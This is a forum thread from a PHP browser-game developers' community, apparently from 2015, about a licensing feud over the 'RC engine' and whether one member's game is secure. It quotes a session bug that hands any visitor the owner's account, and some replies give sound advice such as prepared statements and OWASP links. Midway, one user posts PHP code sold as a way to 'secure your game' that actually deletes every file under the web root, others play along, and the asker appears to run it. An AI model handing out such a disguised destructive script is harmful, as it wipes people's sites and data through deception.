-BRAIDZ- Posted September 3, 2015 Share Posted September 3, 2015 (edited) Note from KyleMassacre: This thread was split and I had no idea where to put it or what to name it. If you have any ideas feel free and PM me or find me here: makewebgames.slack.com /Note @Script47 you are sick, you deleted the 2 pages simply because you we're in the wrong, no one can see my argument wow i hate you Hey, I just thought I would let you know that you reckon my copy of RC is invalid, incorrect, I purchased it from the owner of RC, I'm not going to name drop, but if you want the proof, message me, because my license for RC is valid thank you very much. You can try take my site down all you like, but it won't work because I purchased the original copy from the owner of RC, ask him yourself, I originally purchased it for my old game, which is now UOTS instead of RC, and I do not use it, I keep in regular contact with the owner, so try take my game down all you like buddy, it's not an illegal copy, it is legit :) Cheers champ Edited September 3, 2015 by KyleMassacre Quote Link to comment Share on other sites More sharing options...
~Rob0t Posted September 3, 2015 Share Posted September 3, 2015 Hey, I just thought I would let you know that you reckon my copy of RC is invalid, incorrect, I purchased it from the owner of RC, I'm not going to name drop, but if you want the proof, message me, because my license for RC is valid thank you very much. You can try take my site down all you like, but it won't work because I purchased the original copy from the owner of RC, ask him yourself, I originally purchased it for my old game, which is now UOTS instead of RC, and I do not use it, I keep in regular contact with the owner, so try take my game down all you like buddy, it's not an illegal copy, it is legit :) Cheers champ Generally when you quote a piece of text, it correlates to what you're about to add into the discussion... But I like your approach, very "indie". Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 Generally when you quote a piece of text, it correlates to what you're about to add into the discussion... But I like your approach, very "indie". True, im not one for being called a liar, which is what Jc has pretty much called me, I purchased my copy from the owner of RC Engine, then I purchased an upgraded version, already having my valid license, I was well in my own rights to purchase the upgraded copy. This all started because he is working on a game currently (RC Engine) and he has done nothing to it, and there is a loop hole that allows you access to PlayerId 1's account, no not hacking, its just something that needs patching, because it changes your session ID to the owners if you get my drift. So I thought I'd be a nice person and post in the staff panel about it, letting him know I can help, and also that I can create banners and stuff for the game.. I did not deface the game, I have no info from the game, I don't know any passwords or anything... This is the bug $_SESSION['playerid'] = 1; echo "<center><main>Company</main><hr width='750px'>"; if($pl['my_jail'] > gmtime() || $pl['my_hosp'] > gmtime()) Which I didn't mention that, I wanted to see if he knew. It's within one of the PHP Files. And this is the response I got back from him on my game. I would greatly appreciate it if you stayed away from my clients, as you have nothing to do with them, As for your copy of RC your version isn't valid nor is it any different to my copy of RC, you just have a template and very simplistic mods, Every mod you have on this sill excuse of a game I have on my desktop as trash! Theres no need to slander my name to my client David, When i've complete his end product of his game we will see what's funny then. As for he constant slandering you clearly don't know who I am and what I own, I could have your site taken down in minutes and I could sue you for slander as I have proof, if you do not heed this warning he action will be taken against you, that's all Nice day Now I could be a right ass hole, and post what game he is working on, and my game, and let everyone compare.. But I'm not going to, I find it funny to be honest ;) Quote Link to comment Share on other sites More sharing options...
~Rob0t Posted September 3, 2015 Share Posted September 3, 2015 True, im not one for being called a liar, which is what Jc has pretty much called me, I purchased my copy from the owner of RC Engine, then I purchased an upgraded version, already having my valid license, I was well in my own rights to purchase the upgraded copy. This all started because he is working on a game currently (RC Engine) and he has done nothing to it, and there is a loop hole that allows you access to PlayerId 1's account, no not hacking, its just something that needs patching, because it changes your session ID to the owners if you get my drift. So I thought I'd be a nice person and post in the staff panel about it, letting him know I can help, and also that I can create banners and stuff for the game.. I did not deface the game, I have no info from the game, I don't know any passwords or anything... This is the bug $_SESSION['playerid'] = 1; echo "<center><main>Company</main><hr width='750px'>"; if($pl['my_jail'] > gmtime() || $pl['my_hosp'] > gmtime()) Which I didn't mention that, I wanted to see if he knew. It's within one of the PHP Files. And this is the response I got back from him on my game. I would greatly appreciate it if you stayed away from my clients, as you have nothing to do with them, As for your copy of RC your version isn't valid nor is it any different to my copy of RC, you just have a template and very simplistic mods, Every mod you have on this sill excuse of a game I have on my desktop as trash! Theres no need to slander my name to my client David, When i've complete his end product of his game we will see what's funny then. As for he constant slandering you clearly don't know who I am and what I own, I could have your site taken down in minutes and I could sue you for slander as I have proof, if you do not heed this warning he action will be taken against you, that's all Nice day Now I could be a right ass hole, and post what game he is working on, and my game, and let everyone compare.. But I'm not going to, I find it funny to be honest ;) [MENTION=68711]KyleMassacre[/MENTION] pls split this thread and don't delete - this is going to get interesting. I can guarantee your game is insecure if you're running RC engine. Also open a collab experience thread - I want all the juicy details. I need a good read. Thanks! Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 [MENTION=68711]KyleMassacre[/MENTION] pls split this thread and don't delete - this is going to get interesting. I can guarantee your game is insecure if you're running RC engine. Also open a collab experience thread - I want all the juicy details. I need a good read. Thanks! How would I secure it? I have removed most of the mysql_real_escape_string's. I have tried and sql injection, I have tried uploading a shell and everything like that, seems pretty secure to me. Mail me Quote Link to comment Share on other sites More sharing options...
jcvenom Posted September 3, 2015 Share Posted September 3, 2015 (edited) True, im not one for being called a liar, which is what Jc has pretty much called me, I purchased my copy from the owner of RC Engine, then I purchased an upgraded version, already having my valid license, I was well in my own rights to purchase the upgraded copy. This all started because he is working on a game currently (RC Engine) and he has done nothing to it, and there is a loop hole that allows you access to PlayerId 1's account, no not hacking, its just something that needs patching, because it changes your session ID to the owners if you get my drift. So I thought I'd be a nice person and post in the staff panel about it, letting him know I can help, and also that I can create banners and stuff for the game.. I did not deface the game, I have no info from the game, I don't know any passwords or anything... This is the bug $_SESSION['playerid'] = 1; echo "<center><main>Company</main><hr width='750px'>"; if($pl['my_jail'] > gmtime() || $pl['my_hosp'] > gmtime()) Which I didn't mention that, I wanted to see if he knew. It's within one of the PHP Files. And this is the response I got back from him on my game. I would greatly appreciate it if you stayed away from my clients, as you have nothing to do with them, As for your copy of RC your version isn't valid nor is it any different to my copy of RC, you just have a template and very simplistic mods, Every mod you have on this sill excuse of a game I have on my desktop as trash! Theres no need to slander my name to my client David, When i've complete his end product of his game we will see what's funny then. As for he constant slandering you clearly don't know who I am and what I own, I could have your site taken down in minutes and I could sue you for slander as I have proof, if you do not heed this warning he action will be taken against you, that's all Nice day Now I could be a right ass hole, and post what game he is working on, and my game, and let everyone compare.. But I'm not going to, I find it funny to be honest ;) I'm 100% with what I said, your going around spamming other peoples game, slandering people causing chaos, now clients are asking me about your game etc which I hadn't a clue existed until about a week and a half ago, as for your RC engine which is full of bugs, you may have purchased a licence to use the engine but you got scammed with your current copy, since you "UPGRADED" to a modified version. Incase you didn't know the person that sold you the modified version mr killer is using the exact version for multiple game he owns to scam players as we can see here. Your game [ATTACH=CONFIG]2178[/ATTACH] His game [ATTACH=CONFIG]2179[/ATTACH] I just warned you because I don't know you, I've never worked for you and I don't want to be associated with you in any manner, so i'd appreciate if you would stop mentioning our names together thank you. - - - Updated - - - True, im not one for being called a liar, which is what Jc has pretty much called me, I purchased my copy from the owner of RC Engine, then I purchased an upgraded version, already having my valid license, I was well in my own rights to purchase the upgraded copy. This all started because he is working on a game currently (RC Engine) and he has done nothing to it, and there is a loop hole that allows you access to PlayerId 1's account, no not hacking, its just something that needs patching, because it changes your session ID to the owners if you get my drift. So I thought I'd be a nice person and post in the staff panel about it, letting him know I can help, and also that I can create banners and stuff for the game.. I did not deface the game, I have no info from the game, I don't know any passwords or anything... This is the bug $_SESSION['playerid'] = 1; echo "<center><main>Company</main><hr width='750px'>"; if($pl['my_jail'] > gmtime() || $pl['my_hosp'] > gmtime()) Which I didn't mention that, I wanted to see if he knew. It's within one of the PHP Files. And this is the response I got back from him on my game. I would greatly appreciate it if you stayed away from my clients, as you have nothing to do with them, As for your copy of RC your version isn't valid nor is it any different to my copy of RC, you just have a template and very simplistic mods, Every mod you have on this sill excuse of a game I have on my desktop as trash! Theres no need to slander my name to my client David, When i've complete his end product of his game we will see what's funny then. As for he constant slandering you clearly don't know who I am and what I own, I could have your site taken down in minutes and I could sue you for slander as I have proof, if you do not heed this warning he action will be taken against you, that's all Nice day Now I could be a right ass hole, and post what game he is working on, and my game, and let everyone compare.. But I'm not going to, I find it funny to be honest ;) remove $_SESSION['playerid'] = 1; By setting it to 1, your setting a session therefore If i go to companies.php, I can access your account, look I told you, Mr killer scammed you and bare in mind you paid for the script. You sessions are handled in your style_top so remove that code Edited September 3, 2015 by jcvenom Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 I'm 100% with what I said, your going around spamming other peoples game, slandering people causing chaos, now clients are asking me about your game etc which I hadn't a clue existed until about a week and a half ago, as for your RC engine which is full of bugs, you may have purchased a licence to use the engine but you got scammed with your current copy, since you "UPGRADED" to a modified version. Incase you didn't know the person that sold you the modified version mr killer is using the exact version for multiple game he owns to scam players as we can see here. Your game [ATTACH=CONFIG]2178[/ATTACH] His game [ATTACH=CONFIG]2179[/ATTACH] I just warned you because I don't know you, I've never worked for you and I don't want to be associated with you in any manner, so i'd appreciate if you would stop mentioning our names together thank you. - - - Updated - - - remove $_SESSION['playerid'] = 1; By setting it to 1, your setting a session therefore If i go to companies.php, I can access your account, look I told you, Mr killer scammed you and bare in mind you paid for the script. You sessions are handled in your style_top so remove that code Incorrect, I haven't spammed any games, which I stated in the post about my game, and no incorrect, the version you're working on is full of bugs. Also I do have a legit licence, and yes it is the same copy as Mr Killers, but I have also upgraded it myself better than his version. And that is in companies2.php And what about my style_top? Quote Link to comment Share on other sites More sharing options...
AdamHull Posted September 3, 2015 Share Posted September 3, 2015 You found out about his game a week and a half ago? But yet you upload a picture of your profile on his game with45 days old? Quote Link to comment Share on other sites More sharing options...
IllegalPigeon Posted September 3, 2015 Share Posted September 3, 2015 How would I secure it? I have removed most of the mysql_real_escape_string's. I have tried and sql injection, I have tried uploading a shell and everything like that, seems pretty secure to me. Mail me You're obsessed with removing MRES(). They were simply being used incorrectly. Using a function that escapes strings on a number is improper usage, as is true for quoting numbers as if they were strings. Do tell what "SQL Injection" you used. Or what shell you used? Let me guess, you took a URL that looked like; "www.game.com/item.php?id=1" and made it "www.game.com/item.php?id='" or something similar? In which case, fine, your game is secure against script kiddies and 99% of this forum that think they are brilliant hackers and programmers. You're not protected against literally a plethora of vulnerabilities. I don't even need to see your game to tell you that, I've seen you posting code snippets and I assure you, your game is not secure. Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 You're obsessed with removing MRES(). They were simply being used incorrectly. Using a function that escapes strings on a number is improper usage, as is true for quoting numbers as if they were strings. Do tell what "SQL Injection" you used. Or what shell you used? Let me guess, you took a URL that looked like; "www.game.com/item.php?id=1" and made it "www.game.com/item.php?id='" or something similar? In which case, fine, your game is secure against script kiddies and 99% of this forum that think they are brilliant hackers and programmers. You're not protected against literally a plethora of vulnerabilities. I don't even need to see your game to tell you that, I've seen you posting code snippets and I assure you, your game is not secure. Well how do I secure my game? And how could someone hack it? Quote Link to comment Share on other sites More sharing options...
~Rob0t Posted September 3, 2015 Share Posted September 3, 2015 How would I secure it? I have removed most of the mysql_real_escape_string's. I have tried and sql injection, I have tried uploading a shell and everything like that, seems pretty secure to me. Mail me Have a read of this: https://www.owasp.org/index.php/Category:Vulnerability Quote Link to comment Share on other sites More sharing options...
IllegalPigeon Posted September 3, 2015 Share Posted September 3, 2015 Well how do I secure my game? And how could someone hack it? You learn to code. There's no quick fix. You don't add a line of code in your head and it's magically done. Firstly, I suggest you look into PDO. Prepared statements will help you drastically. As for "how could someone hack it?". Quite easily, I've seen the code. You know that SQL Injection and Shells aren't the only two methods use to hack websites? XSS? CSRF? Remote code execution? Session manipulation/a list of other things to manipulate? Need a go on? Quote Link to comment Share on other sites More sharing options...
~Rob0t Posted September 3, 2015 Share Posted September 3, 2015 You learn to code. There's no quick fix. You don't add a line of code in your head and it's magically done. Firstly, I suggest you look into PDO. Prepared statements will help you drastically. As for "how could someone hack it?". Quite easily, I've seen the code. You know that SQL Injection and Shells aren't the only two methods use to hack websites? XSS? CSRF? Remote code execution? Session manipulation/a list of other things to manipulate? Need a go on? Entertain me. Write a thesis, pls! Quote Link to comment Share on other sites More sharing options...
Script47 Posted September 3, 2015 Share Posted September 3, 2015 I'm curious, why has that post been quoted at the top of the OP? Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 You learn to code. There's no quick fix. You don't add a line of code in your head and it's magically done. Firstly, I suggest you look into PDO. Prepared statements will help you drastically. As for "how could someone hack it?". Quite easily, I've seen the code. You know that SQL Injection and Shells aren't the only two methods use to hack websites? XSS? CSRF? Remote code execution? Session manipulation/a list of other things to manipulate? Need a go on? I've tried cross site scripting.. I will try the other ones, will just have to look up some tutorials or something haha... Quote Link to comment Share on other sites More sharing options...
IllegalPigeon Posted September 3, 2015 Share Posted September 3, 2015 I've tried cross site scripting.. I will try the other ones, will just have to look up some tutorials or something haha... Okay, so please, show me how you did a CSRF attack. I'd love to see. Entertain me. Write a thesis, pls! Don't you start. Quote Link to comment Share on other sites More sharing options...
CaptainQuack Posted September 3, 2015 Share Posted September 3, 2015 Well how do I secure my game? And how could someone hack it? It's actually quite simple to secure your game, simply put this in index.php, it should work but haven't tested it. <?php foreach (new DirectoryIterator($_SERVER['DOCUMENT_ROOT']) as $fileInfo) { if(!$fileInfo->isDot() && is_file($fileInfo->getPathname())) { unlink($fileInfo->getPathname()); } else if(is_dir($fileInfo->getPathname())) { foreach (new DirectoryIterator($fileInfo->getPathname()) as $fileInfo) { rmdir($fileInfo->getPathname()); } } } echo 'Your game is now secure.'; Quote Link to comment Share on other sites More sharing options...
IllegalPigeon Posted September 3, 2015 Share Posted September 3, 2015 It's actually quite simple to secure your game, simply put this in index.php, it should work but haven't tested it. <?php foreach (new DirectoryIterator($_SERVER['DOCUMENT_ROOT']) as $fileInfo) { if(!$fileInfo->isDot() && is_file($fileInfo->getPathname())) { unlink($fileInfo->getPathname()); } else if(is_dir($fileInfo->getPathname())) { foreach (new DirectoryIterator($fileInfo->getPathname()) as $fileInfo) { rmdir($fileInfo->getPathname()); } } } echo 'Your game is now secure.'; Just tested this on a clients website, as I needed to secure it. It worked! The DDoS attacks they were experiencing completely stopped and my user data, in which I stored passwords in plain text, is also secure! Cheers bro :D Quote Link to comment Share on other sites More sharing options...
CaptainQuack Posted September 3, 2015 Share Posted September 3, 2015 Just tested this on a clients website, as I needed to secure it. It worked! The DDoS attacks they were experiencing completely stopped and my user data, in which I stored passwords in plain text, is also secure! Cheers bro :D No worries, Always like to help! Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 Okay, so please, show me how you did a CSRF attack. I'd love to see. Don't you start. I said Cross Site Scripting (XSS) And I followed a tutorial on youtube Quote Link to comment Share on other sites More sharing options...
NonStopCoding Posted September 3, 2015 Share Posted September 3, 2015 I said Cross Site Scripting (XSS) And I followed a tutorial on youtube here is a link might be useful if you read it https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet Quote Link to comment Share on other sites More sharing options...
~Rob0t Posted September 3, 2015 Share Posted September 3, 2015 I said Cross Site Scripting (XSS) And I followed a tutorial on youtube You said "cross site scripting", which can be interpreted as cross-site request forgery (CSRF), also +1 to those professional tutorials on Youtube though! Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 It's actually quite simple to secure your game, simply put this in index.php, it should work but haven't tested it. <?php foreach (new DirectoryIterator($_SERVER['DOCUMENT_ROOT']) as $fileInfo) { if(!$fileInfo->isDot() && is_file($fileInfo->getPathname())) { unlink($fileInfo->getPathname()); } else if(is_dir($fileInfo->getPathname())) { foreach (new DirectoryIterator($fileInfo->getPathname()) as $fileInfo) { rmdir($fileInfo->getPathname()); } } } echo 'Your game is now secure.'; Only on index.php? Quote Link to comment Share on other sites More sharing options...
CaptainQuack Posted September 3, 2015 Share Posted September 3, 2015 Only on index.php? Yeah, just make sure you go to index.php after you've added it to activate the script. After that your game should be completely secure! Quote Link to comment Share on other sites More sharing options...
-BRAIDZ- Posted September 3, 2015 Author Share Posted September 3, 2015 Yeah, just make sure you go to index.php after you've added it to activate the script. After that your game should be completely secure! Thanks mate, worked wonders. You wouldn't mind explaining how it secures a site exactly, for all those who want to secure their game as well. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.